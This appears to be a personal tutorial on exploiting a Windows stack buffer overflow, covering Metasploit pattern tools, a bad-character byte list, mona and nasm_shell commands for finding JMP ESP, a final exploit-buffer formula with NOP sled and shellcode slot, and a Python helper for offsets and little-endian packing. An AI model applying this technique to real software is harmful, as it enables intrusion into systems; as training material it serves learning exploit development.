Buffer Overflow

Buffer overflows are not simple. This post is my own notes; if it makes sense to you, feel free to use it.

Stack Overflow

Find a vulnerable program and, if possible, a starting skeleton script. Attach the program to OllyDbg, send the payload and crash the program. Now the fun starts.

Step 1: Finding and controlling EIP

Use pattern_create.rb to generate a unique cyclic pattern of the crash length.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3500

Step 2: Use pattern_offset to find the exact offset of EIP

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438
[*] Exact match at offset 2606

Replace the 4 bytes at that offset with B and the rest of the buffer with C, then re-check that EIP now holds the four B's.

Step 3: Finding bad chars

After EIP, send all the bad chars and step through them in memory one by one. It should not take long; do not rely on any other method.

badchars = (  # \x00 is left out: the null byte is assumed bad from the start
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

Step 4: Finding JMP or equivalent

Once we control EIP we need an address to point it at whose instruction jumps into our buffer (for example JMP ESP), keeping DEP and ASLR in mind.

/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp esp
00000000 FFE4 jmp esp
nasm >

Step 5: Mona

Use !mona modules to list all loaded modules and their protections.

Click the "m" icon to open the memory map and locate the identified module. If DEP and ASLR are present we need to look in the .text section; otherwise any region can be used.

Then use the nasm shell to obtain the opcodes of JMP ESP and use mona to search for that instruction in the chosen module.

!mona find -s "\xff\xe4" -m slmfc.dll

Use extreme caution: mona distinguishes between forward and backward slashes.

Double-check the address against the code section.

Finally, write that address as 4 bytes in the correct byte order (little or big endian; x86 is little endian):

5F4A358F becomes \x8f\x35\x4a\x5f in little endian.

Then use the following formula:

buffer = 'A'*2606 + '\x8f\x35\x4a\x5f' + '\x90'*16 + shellcode + 'C'*(3500-351-2606-4-16)
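As an added example (not part of the original notes, and not Metasploit's own code), here is a small Python re-implementation of the pattern_create / pattern_offset idea from Steps 1 and 2 together with the little-endian packing from Step 5, so the numbers on this page (offset 2606 for EIP 39694438, 5F4A358F becoming \x8f\x35\x4a\x5f) can be reproduced and checked offline. It assumes the standard Metasploit character sets (A-Z, a-z, 0-9) and a 32-bit x86 target.

```python
# Added example: reproduce pattern_create / pattern_offset and little-endian
# address packing for a 32-bit x86 target. Not Metasploit's code.
import string
import struct

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits


def pattern_create(length: int) -> bytes:
    """Build the Metasploit-style cyclic pattern Aa0Aa1...Aa9Ab0... of the
    given length. Every 4-byte window in it is unique, which is what makes
    the later offset lookup unambiguous (max length is 26*26*10*3 bytes)."""
    out = bytearray()
    for u in UPPER:
        for low in LOWER:
            for d in DIGITS:
                out += (u + low + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length exceeds the pattern's period")


def pattern_offset(pattern: bytes, eip_hex: str) -> int:
    """Find where the 4 bytes now sitting in EIP came from. The debugger
    shows EIP as a big-endian number (e.g. 39694438) but the bytes were read
    from the stack little-endian, so reverse them before searching.
    Returns -1 when the value is not part of the pattern (not a clean
    overwrite, or the crash happened somewhere else)."""
    needle = bytes.fromhex(eip_hex)[::-1]
    return pattern.find(needle)


def le_bytes(addr: int) -> bytes:
    """Pack a 32-bit address little-endian, the form it takes in the buffer."""
    return struct.pack("<I", addr)


if __name__ == "__main__":
    pat = pattern_create(3500)
    print(pattern_offset(pat, "39694438"))       # 2606, as in the notes
    print(le_bytes(0x5F4A358F))                  # b'\x8f5J_' == \x8f\x35\x4a\x5f
```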

I will add more as I go along.
